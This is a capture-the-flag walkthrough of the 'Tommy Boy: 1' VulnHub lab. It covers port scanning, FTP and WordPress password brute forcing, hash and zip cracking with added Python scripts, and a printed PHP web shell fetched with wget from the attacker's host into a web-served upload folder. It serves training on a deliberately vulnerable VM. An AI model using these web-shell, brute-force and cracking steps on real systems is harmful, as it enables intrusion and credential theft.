[VulnHub] Tommy Boy: 1

“HOLY SCHNIKES! Tommy Boy needs your help!

The Callahan Auto company has finally entered the world of modern technology and stood up a Web server for their customers to use for ordering brake pads.

Unfortunately, the site just went down and the only person with admin credentials is Tom Callahan Sr. - who just passed away! And to make matters worse, the only other guy with knowledge of the server just quit!

You’ll need to help Tom Jr., Richard and Michelle get the Web page restored again. Otherwise Callahan Auto will most certainly go out of business :-(“ – Brian Johnson

More information and the OVA file download are on the VulnHub page for this VM.

Attacker & Target

Attacker: Kali2 Linux (10.1.1.132/24)

Target: Tommy Boy: 1 (10.1.1.141/24)

Tools

All the tools used here are available in Kali Linux.

Walkthrough

As usual, arp-scan to find the target's IP address:

root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.2  00:50:56:f1:61:7e   VMware, Inc.
10.1.1.141    00:0c:29:8f:0f:b7   VMware, Inc.
10.1.1.254    00:50:56:f1:c0:1f   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.363 seconds (108.34 hosts/sec). 4 responded

10.1.1.141 is our Target!

Then masscan to find open ports on the target (masscan is much faster than nmap for a full 65535-port sweep, so I use it for the full scan and then nmap for a deeper scan of the ports it finds):

root@kali:~/myExercises/tommyboy1# masscan -p1-65535 10.1.1.141/32 --rate=10000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2016-09-04 11:29:55 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 8008/tcp on 10.1.1.141
Discovered open port 22/tcp on 10.1.1.141
Discovered open port 80/tcp on 10.1.1.141
Discovered open port 65534/tcp on 10.1.1.141

Then an nmap service scan of those four ports (output truncated):

...truncated...
Nmap scan report for 10.1.1.141
Host is up (0.00035s latency).
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 4 disallowed entries
| /6packsofb...soda /lukeiamyourfather
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Callahan Auto
8008/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: KEEP OUT
65534/tcp open  ftp     ProFTPD
MAC Address: 00:0C:29:8F:0F:B7 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
...truncated...

From the nmap scan: OpenSSH 7.2p2 on port 22, Apache httpd 2.4.18 on ports 80 and 8008, and ProFTPD on port 65534.

Meanwhile I ran nikto to look for web vulnerabilities.

Nothing on port 8008, but port 80 had some interesting findings:

+ Entry '/6packsofb...soda' in robots.txt returned a non-forbidden or redirect HTTP code (301)
+ OSVDB-3268: /lukeiamyourfather/: Directory indexing found.
+ Entry '/lukeiamyourfather/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /lookalivelowbridge/: Directory indexing found.
+ Entry '/lookalivelowbridge/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/flag-numero-uno.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 4 entries which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS

robots.txt exists and has 4 entries:

User-agent: *
Disallow: /6packsofb...soda
Disallow: /lukeiamyourfather
Disallow: /lookalivelowbridge
Disallow: /flag-numero-uno.txt

The 1st Flag

The 1st Flag is B34rcl4ws

I also checked the other folders but found nothing, so I decided to move on.

Then, looking at the source of the index page on port 80, I found hidden comments:

<html>
<title>Welcome to Callahan Auto</title>
<body>
<H1><center>Welcome to Callahan Auto!</center></H1>
<font color="FF3339"><H2>SYSTEM ERROR!</H2></font>
If your'e reading this, the Callahan Auto customer ordering system is down.  Please restore the backup copy immediately.
<p>
See Nick in IT for assistance.
</html>
<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal.  Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8-->
<!--Comment from Richard: Ah! How could I forget?  Thanks-->
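
Both hints so far came from files and markup that are easy to skip by eye: robots.txt Disallow entries and HTML comments left after the closing tag. The following is an added example for this write-up, not code from the original post or the VM: a small recon helper that parses a robots.txt body into paths to request, pulls every comment out of page source, and lists any URLs mentioned in those comments. The sample inputs are the robots.txt and index page shown above, embedded as constructed test data so the script runs offline; the base URL is the target address from this walkthrough.

```python
"""Recon helper: robots.txt Disallow paths and HTML comments from page source.
Added example for this write-up, not code from the original post or the VM.
The sample inputs below are copied from the page and embedded so it runs offline."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed sample input: the robots.txt shown above.
ROBOTS_TXT = """User-agent: *
Disallow: /6packsofb...soda
Disallow: /lukeiamyourfather
Disallow: /lookalivelowbridge
Disallow: /flag-numero-uno.txt
"""

# Constructed sample input: the index page shown above (comments sit after </html>).
INDEX_HTML = """<html>
<title>Welcome to Callahan Auto</title>
<body>
<H1><center>Welcome to Callahan Auto!</center></H1>
<font color="FF3339"><H2>SYSTEM ERROR!</H2></font>
If your'e reading this, the Callahan Auto customer ordering system is down.  Please restore the backup copy immediately.
<p>
See Nick in IT for assistance.
</html>
<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal.  Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8-->
<!--Comment from Richard: Ah! How could I forget?  Thanks-->
"""


def robots_disallows(text):
    """Disallow paths in file order; '#' comments and empty values are skipped."""
    paths = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths


class _Comments(HTMLParser):
    def __init__(self):
        super().__init__()
        self.found = []

    def handle_comment(self, data):
        self.found.append(data.strip())


def html_comments(source):
    """Every <!-- ... --> comment in a page, including ones after </html>."""
    parser = _Comments()
    parser.feed(source)
    parser.close()
    return parser.found


URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def urls_in(comments):
    """Absolute URLs mentioned inside comments (the YouTube hint, here)."""
    return [u for c in comments for u in URL_RE.findall(c)]


def disallowed_urls(base, robots_text):
    """Disallow entries turned into full URLs to request by hand."""
    return [urljoin(base, p) for p in robots_disallows(robots_text)]


if __name__ == "__main__":
    for url in disallowed_urls("http://10.1.1.141/", ROBOTS_TXT):
        print("check:", url)
    for comment in html_comments(INDEX_HTML):
        print("comment:", comment)
    print("urls:", urls_in(html_comments(INDEX_HTML)))
```

In practice the two constants would be replaced by the bodies of GET /robots.txt and GET / fetched from the target; nikto already flags the robots.txt entries, but it does not surface comments, which is where the real lead on this box was.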

The comment points to a YouTube clip (https://www.youtube.com/watch?v=VUxOd4CszJ8); the place named in that scene is the folder name, so the hidden blog is at http://10.1.1.141/prehistoricforest.

Going through the blog (if you get a Database Error, restarting the target VM fixes it), the clue for the 2nd flag is in the post Announcing the Callahan internal company blog!, at http://10.1.1.141/prehistoricforest/index.php/2016/07/06/announcing-the-callahan-internal-company-blog/

The 2nd Flag

The 2nd Flag is Z4l1nsky

The post SON OF A! gives another hint: an image at http://10.1.1.141/richard/shockedrichard.jpg

Running exif on the image shows what looks like an MD5 hash in the User Comment tag:

root@kali:~/myExercises/tommyboy1# exif shockedrichard.jpg
EXIF tags in 'shockedrichard.jpg' ('Intel' byte order):
--------------------+----------------------------------------------------------
Tag                 |Value
--------------------+----------------------------------------------------------
Software            |Google
Copyright           |Copyright © 1995 Paramount Pictures Corporation. Credit: ©
X-Resolution        |72
Y-Resolution        |72
Resolution Unit     |Inch
Exif Version        |Exif Version 2.2
User Comment        |ce154b5a8e59c89732bc25d6a2e6b90b
Pixel X Dimension   |1600
Pixel Y Dimension   |1029
FlashPixVersion     |FlashPix Version 1.0
Color Space         |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------

Cracking the hash with an online lookup gives the password spanky.

The post Protected: Status of restoring company home page asks for a password.

Entering spanky unlocks the protected post.
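
The User Comment is a bare, unsalted MD5, so it does not need an online service; a local dictionary run against a hash like this finishes instantly and keeps material from an engagement off third-party sites. The following is an added example for this write-up, not code from the original post: a minimal offline dictionary attack with a few mangling rules. PAGE_HASH is the digest from the EXIF output above; SAMPLE_WORDLIST is constructed test data.

```python
"""Offline dictionary attack on an unsalted MD5 digest. Added example for this
write-up, not code from the original post. SAMPLE_WORDLIST is constructed."""
import hashlib

# EXIF User Comment from shockedrichard.jpg, as shown on the page.
PAGE_HASH = "ce154b5a8e59c89732bc25d6a2e6b90b"
SAMPLE_WORDLIST = ["richard", "callahan", "spanky", "tommy"]  # constructed


def md5_hex(word):
    """Hex MD5 of a candidate password (UTF-8 encoded)."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def mangle(word):
    """A few cheap rules on top of the plain word: case variants, a trailing
    digit, a trailing '!'. Real jobs use hashcat/john rule files instead."""
    seen = set()
    for base in (word, word.capitalize(), word.upper()):
        if base in seen:
            continue
        seen.add(base)
        yield base
        for digit in "0123456789":
            yield base + digit
        yield base + "!"


def crack_unsalted_md5(target_hex, wordlist):
    """Return the first mangled candidate whose MD5 equals target_hex, else None."""
    target = target_hex.strip().lower()
    if len(target) != 32 or any(c not in "0123456789abcdef" for c in target):
        raise ValueError("expected a 32-character hex MD5 digest")
    for word in wordlist:
        for candidate in mangle(word.strip()):
            if md5_hex(candidate) == target:
                return candidate
    return None


if __name__ == "__main__":
    # The page reports this hash resolves to spanky.
    print(crack_unsalted_md5(PAGE_HASH, SAMPLE_WORDLIST))
```

For anything larger than a toy wordlist, hand the digest to hashcat (mode 0) or john with a proper rule set; the point here is only that an unsalted fast hash found in metadata is a local job, not something to paste into a web form.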

Some important information from the post:

  • To restore the site, a backup file called callahanbak.bak has to be put back as index.html, and this has to be done from Big Tom's account over SSH.

  • Big Tom's account name is in the user list; it is not bigtom, but it is easy to recognise.

  • An FTP service runs on a non-standard port (65534, which nmap found earlier) and is accessible with Nick's account.

  • Nick's account name is nickburns and his password is very easy to guess.

  • Nick can only use FTP, not SSH.

Based on this, a quick hydra run with -e nsr (try an empty password, the login name itself and the login name reversed) against the FTP port:

root@kali:~/myExercises/tommyboy1# hydra -e nsr -l nickburns ftp://10.1.1.141:65534/
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-04 22:36:19
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
[DATA] attacking service ftp on port 65534
[65534][ftp] host: 10.1.1.141   login: nickburns   password: nickburns
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-09-04 22:36:20

Nick's FTP credentials are nickburns / nickburns.

Log in to FTP as Nick and download the only file there, readme.txt:

root@kali:~/myExercises/tommyboy1# ftp 10.1.1.141 65534
Connected to 10.1.1.141.
220 Callahan_FTP_Server 1.3.5
Name (10.1.1.141:root): nickburns
331 Password required for nickburns
Password:
230 User nickburns logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> list
?Invalid command
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 nickburns nickburns      977 Jul 15 02:37 readme.txt
226 Transfer complete
ftp> get readme.txt
local: readme.txt remote: readme.txt
200 PORT command successful
150 Opening BINARY mode data connection for readme.txt (977 bytes)
226 Transfer complete
977 bytes received in 0.02 secs (40.6745 kB/s)
ftp> bye
221 Goodbye.

Since the blog is a WordPress site, I ran wpscan to check for known vulnerabilities and enumerate users:

...truncated...
[+] Identified the following 4 user/s:
    +----+----------+-------------------+
    | Id | Login    | Name              |
    +----+----------+-------------------+
    | 1  | richard  | richard           |
    | 2  | tom      | Big Tom           |
    | 3  | tommy    | Tom Jr.           |
    | 4  | michelle | Michelle Michelle |
    +----+----------+-------------------+
...truncated...

Four WP users found:

richard
tom
tommy
michelle

Then I ran wpscan's password attack against those four users with rockyou.txt and got tom's password:

  +----+----------+-------------------+----------+
  | Id | Login    | Name              | Password |
  +----+----------+-------------------+----------+
  | 1  | richard  | richard           |          |
  | 2  | tom      | Big Tom           | tomtom1  |
  | 3  | tommy    | Tom Jr.           |          |
  | 4  | michelle | Michelle Michelle |          |
  +----+----------+-------------------+----------+

Port 8008 serves different content when the request carries an iPhone 3 User-Agent.

With that User-Agent set, I ran wfuzz with rockyou.txt against /NickIzL33t/ on port 8008 to find the hidden HTML file:

root@kali:~# wfuzz -c -v -w /usr/share/wordlists/rockyou.txt -H "User-Agent:Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" --hc 404 http://10.1.1.141:8008/NickIzL33t/FUZZ.html
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://10.1.1.141:8008/NickIzL33t/FUZZ.html
Total requests: 14344392


==============================================================================================================================================
ID    C.Time   Response   Lines      Word         Chars                  Server                                             Redirect   Request
==============================================================================================================================================

97206:  0.040s   C=200     12 L        65 W       459 Ch     Apache/2.4.18 (Ub                                                        "fallon1"
...truncated...

The 3rd Flag

The 3rd Flag is TinyHead

Alongside the flag there is an encrypted zip file, t0msp4ssw0rdz.zip, and a hint file with clues about its password:

Password information:

  • starts with bev
  • one uppercase character
  • two numbers
  • two lowercase characters
  • one symbol
  • ends with 1995

bev[A-Z][0-9][0-9][a-z][a-z][symbol]1995

Then I used crunch to generate a wordlist matching that pattern (in a -t mask, , is an uppercase letter, % a digit, @ a lowercase letter and ^ a symbol; the fixed length 13 matches the mask):

root@kali:~/myExercises/tommyboy1# crunch 13 13 -t bev,%%@@^1995 -o pass_dict.lst
Crunch will now generate the following amount of data: 812011200 bytes
774 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 58000800

crunch:  27% completed generating output

crunch:  53% completed generating output

crunch:  83% completed generating output

crunch: 100% completed generating output

Then fcrackzip in dictionary mode (-D) with that wordlist, using -u so each candidate is verified with unzip rather than trusting the header check alone, cracks the archive:

root@kali:~/myExercises/tommyboy1# fcrackzip -v -D -u -p pass_dict.lst t0msp4ssw0rdz.zip
found file 'passwords.txt', (size cp/uc    332/   641, flags 9, chk 9aad)
checking pw bevG72kn~1995

PASSWORD FOUND!!!!: pw == bevH00tr$1995

The password is bevH00tr$1995 and the archive contains passwords.txt:
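
The crunch step materialises 774 MB on disk for a keyspace that a cracker can consume as fast as it is generated. The following is an added example for this write-up, not code from the original post: it expands a mask with crunch's -t placeholder semantics lazily, computes the keyspace up front, checks a candidate against the mask, and can try the candidates directly against a ZipCrypto archive with Python's zipfile. The symbol set is an assumption (33 characters, the size that makes the count agree with the 58,000,800 lines crunch reported for this mask); the mask itself is the one from the hint file.

```python
"""Mask expansion with crunch -t placeholders (@ lower, , upper, % digit,
^ symbol; anything else is a literal). Added example for this write-up, not
code from the original post. SYMBOLS is an assumed 33-character set."""
import itertools
import string
import sys
import zipfile
import zlib

SYMBOLS = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ "  # assumed crunch default set, 33 chars
CLASSES = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": SYMBOLS,
}
MASK = "bev,%%@@^1995"  # the pattern from the hint file


def mask_slots(mask):
    """One alphabet per position: a class for placeholders, the char itself otherwise."""
    return [CLASSES.get(ch, ch) for ch in mask]


def keyspace(mask):
    """Number of candidates the mask expands to (no wordlist needed to know it)."""
    total = 1
    for slot in mask_slots(mask):
        total *= len(slot)
    return total


def expand(mask):
    """Yield every candidate lazily, rightmost placeholder varying fastest (odometer order)."""
    for combo in itertools.product(*mask_slots(mask)):
        yield "".join(combo)


def matches_mask(candidate, mask):
    """True if candidate could have been produced by the mask."""
    slots = mask_slots(mask)
    return len(candidate) == len(slots) and all(
        ch in slot for ch, slot in zip(candidate, slots)
    )


def crack_zip(path, candidates):
    """Try each candidate on the first member of a ZipCrypto archive.
    A wrong password usually fails the 1-byte header check (RuntimeError); the
    ~1/256 that slip past fail on decompression or CRC, so read the member fully."""
    with zipfile.ZipFile(path) as zf:
        member = zf.namelist()[0]
        for pw in candidates:
            try:
                with zf.open(member, pwd=pw.encode()) as fh:
                    fh.read()
                return pw
            except (RuntimeError, zipfile.BadZipFile, zlib.error):
                continue
    return None


if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.argv[1] == "--stream":
        # python3 mask.py --stream | <cracker that reads candidates on stdin>
        for pw in expand(MASK):
            sys.stdout.write(pw + "\n")
    elif len(sys.argv) > 1:
        print("password:", crack_zip(sys.argv[1], expand(MASK)))
    else:
        print(f"{MASK}: {keyspace(MASK):,} candidates, first {next(expand(MASK))!r}")
```

Pure-Python ZipCrypto checking is slow compared with fcrackzip, so for a 58 million candidate space the --stream mode feeding a native cracker is the practical path; the in-script crack_zip is there to show that the header check byte is why a verifying pass (fcrackzip's -u) is needed before trusting a hit.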

root@kali:~/myExercises/tommyboy1# cat passwords.txt
Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

Logging into the blog as Big Tom (user tom, password tomtom1 from the wpscan brute force) shows a draft post with the missing numbers, which gives the full server password:

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat1938!!

Login to SSH as Big Tom:

root@kali:~/myExercises/tommyboy1# ssh bigtommysenior@10.1.1.141
The authenticity of host '10.1.1.141 (10.1.1.141)' can't be established.
ECDSA key fingerprint is SHA256:bI4/w4tR6j1XRyuLkIs5icsyLJM0Kfw9m4iPFpXX0NI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.1.141' (ECDSA) to the list of known hosts.
bigtommysenior@10.1.1.141's password:
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

112 packages can be updated.
0 updates are security updates.


Last login: Thu Jul 14 13:45:57 2016
bigtommysenior@CallahanAutoSrv01:~$ id
uid=1002(bigtommysenior) gid=1002(bigtommysenior) groups=1002(bigtommysenior)
bigtommysenior@CallahanAutoSrv01:~$ uname -a
Linux CallahanAutoSrv01 4.4.0-36-generic #55-Ubuntu SMP Thu Aug 11 18:01:55 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
bigtommysenior@CallahanAutoSrv01:~$ pwd
/home/bigtommysenior
bigtommysenior@CallahanAutoSrv01:~$ ls -la
total 40
drwxr-x--- 4 bigtommysenior bigtommysenior 4096 Jul  8 08:57 .
drwxr-xr-x 5 root           root           4096 Jul  7 00:17 ..
-rw------- 1 bigtommysenior bigtommysenior    0 Jul 21 17:47 .bash_history
-rw-r--r-- 1 bigtommysenior bigtommysenior  220 Jul  7 00:12 .bash_logout
-rw-r--r-- 1 bigtommysenior bigtommysenior 3771 Jul  7 00:12 .bashrc
drwx------ 2 bigtommysenior bigtommysenior 4096 Jul  7 00:16 .cache
-rw-r--r-- 1 bigtommysenior bigtommysenior  307 Jul  7 14:18 callahanbak.bak
-rw-rw-r-- 1 bigtommysenior bigtommysenior  237 Jul  7 15:27 el-flag-numero-quatro.txt
-rw-rw-r-- 1 bigtommysenior bigtommysenior  630 Jul  7 17:59 LOOT.ZIP
drwxrwxr-x 2 bigtommysenior bigtommysenior 4096 Jul  7 13:50 .nano
-rw-r--r-- 1 bigtommysenior bigtommysenior  675 Jul  7 00:12 .profile
-rw-r--r-- 1 bigtommysenior bigtommysenior    0 Jul  7 00:17 .sudo_as_admin_successful
bigtommysenior@CallahanAutoSrv01:~$ 

The 4th Flag

bigtommysenior@CallahanAutoSrv01:~$ cat el-flag-numero-quatro.txt
YAY!  Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.

Flag data: EditButton

But...but...where's flag 5?  

I'll make it easy on you.  It's in the root of this server at /5.txt

Restoring the site from the backup brings the server back online:

bigtommysenior@CallahanAutoSrv01:~$ cp callahanbak.bak /var/www/html/index.html
bigtommysenior@CallahanAutoSrv01:~$ ls -l /var/www/html/index.html
-rw-r--r-- 1 bigtommysenior bigtommysenior 307 Sep  5 07:16 /var/www/html/index.html
bigtommysenior@CallahanAutoSrv01:~$ cat /var/www/html/index.html
<html>
<title>Welcome to Callahan Auto</title>
<body>
<H1><center>Welcome to Callahan Auto!</center></H1>
<font color="0000ff"><H2><center>SYSTEM STATUS: ONLINE</center></H2></font>
<H3>We're happy to be serving all your brakepad needs.</H3>
<p>
<center><img src="ca.jpeg"></center>
<p>
<p>
</html>
<!---->

Enumerating world-writable directories (note that -perm -222 only matches directories with the owner, group and other write bits all set; -perm -o+w or -perm -0002 catches anything writable by others regardless of the other bits):

bigtommysenior@CallahanAutoSrv01:/var/www/html$ find / -perm -222 -type d 2>/dev/null
/var/lib/php/sessions
/var/crash
/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads
/var/tmp
/dev/mqueue
/dev/shm
/run/lock
/tmp
/tmp/.XIM-unix
/tmp/.Test-unix
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/.X11-unix
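
Most of that list is noise: /tmp and friends are sticky, so anyone can add files but only the owner can replace or remove them, and nothing in them is served by Apache. The interesting entry is the uploads directory under /var/thatsg0nnaleaveamark, whose NickIzL33t path matches the hidden directory on port 8008 and which is world-writable without the sticky bit. The following is an added example for this write-up, not code from the original post: it walks the filesystem, classifies each world-writable directory by sticky bit, and flags the ones that sit under a web-served path. WEB_ROOTS is an assumption taken from the paths seen on this box.

```python
"""Which writable directories actually matter: world-writable without the
sticky bit, and under a path the web server serves. Added example for this
write-up, not code from the original post; WEB_ROOTS is assumed."""
import os
import stat

WEB_ROOTS = ("/var/www", "/var/thatsg0nnaleaveamark")  # assumed from the page's paths
SKIP = ("/proc", "/sys", "/dev")  # pseudo-filesystems, not worth walking


def classify_mode(mode):
    """None if not a world-writable directory; otherwise 'world-writable' or
    'world-writable (sticky)'. Sticky dirs such as /tmp let anyone create
    files but not replace or delete other users' files."""
    if not stat.S_ISDIR(mode) or not mode & stat.S_IWOTH:
        return None
    return "world-writable (sticky)" if mode & stat.S_ISVTX else "world-writable"


def _under(path, prefixes):
    """True if path equals or lies beneath any of the prefixes."""
    return any(path == p or path.startswith(p.rstrip("/") + "/") for p in prefixes)


def is_web_served(path, roots=WEB_ROOTS):
    """A dropped .php in such a directory runs as the web server user."""
    return _under(path, roots)


def writable_dirs(root="/", skip=SKIP):
    """Return (path, kind, web_served) for every world-writable directory
    below root, most exploitable first: non-sticky, then web-served."""
    findings = []
    for dirpath, dirnames, _ in os.walk(root):
        if _under(dirpath, skip):
            dirnames[:] = []
            continue
        try:
            kind = classify_mode(os.lstat(dirpath).st_mode)
        except OSError:
            continue
        if kind:
            findings.append((dirpath, kind, is_web_served(dirpath)))
    findings.sort(key=lambda f: (f[1] != "world-writable", not f[2], f[0]))
    return findings


if __name__ == "__main__":
    for path, kind, served in writable_dirs():
        print(f"{path}\t{kind}\t{'WEB-SERVED' if served else ''}")
```

Run as the low-privilege user on the target; the first lines of output are the directories where a file you drop is both under your control and reachable through the web server, which is exactly the condition the next step relies on.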

Now drop a one-line PHP shell into the writable folder /var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads as sh.php. Commands run through it execute as the web server user, not as bigtommysenior.

The PHP shell:

root@kali:/var/www/html# cat shell.php
<?php system($_GET['cmd']); ?>

Fetch it onto the target with wget (the attacker box is serving it over HTTP):

bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ wget http://10.1.1.132/shell.php -O sh.php
--2016-09-05 07:38:35--  http://10.1.1.132/shell.php
Connecting to 10.1.1.132:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31
Saving to: ‘sh.php’

sh.php                                              100%[================================================================================================================>]      31  --.-KB/s    in 0s

2016-09-05 07:38:35 (6.03 MB/s) - ‘sh.php’ saved [31/31]

bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls -la
total 20
drwxrwxrwx 2 www-data       www-data       4096 Sep  5 07:38 .
drwxr-xr-x 3 www-data       www-data       4096 Jul 15 12:47 ..
-rw-r--r-- 1 root           root            243 Jul 15 12:23 .htaccess
-rw-r--r-- 1 root           root            447 Jul 15 12:32 index.html
-rw-rw-r-- 1 bigtommysenior bigtommysenior   31 Aug 24 06:43 sh.php

The 5th Flag

Found the 5th flag file, /5.txt:

The 5th flag is Buttcrack

Now concatenate all five flags to form the password for LOOT.ZIP: B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

Great, now to open the LOOT.ZIP file:

bigtommysenior@CallahanAutoSrv01:~$ unzip LOOT.ZIP
Archive:  LOOT.ZIP
[LOOT.ZIP] THE-END.txt password:
  inflating: THE-END.txt
bigtommysenior@CallahanAutoSrv01:~$ ls
callahanbak.bak  el-flag-numero-quatro.txt  LOOT.ZIP  THE-END.txt
bigtommysenior@CallahanAutoSrv01:~$ cat THE-END.txt
YOU CAME.
YOU SAW.
YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!

I'd love to know that you finished this VM, and/or get your suggestions on how to make the next 
one better.

Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!"

Or, get in touch with me other ways:

* Twitter: @7MinSec
* IRC (Freenode): #vulnhub (username is braimee)

Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at
bit.ly/7minsec

</shamelessplugs>

Thanks and have a blessed week!

-Brian Johnson
7 Minute Security

Hooooo, finally, Got it!!

2016-09-13 21:40:53 +1000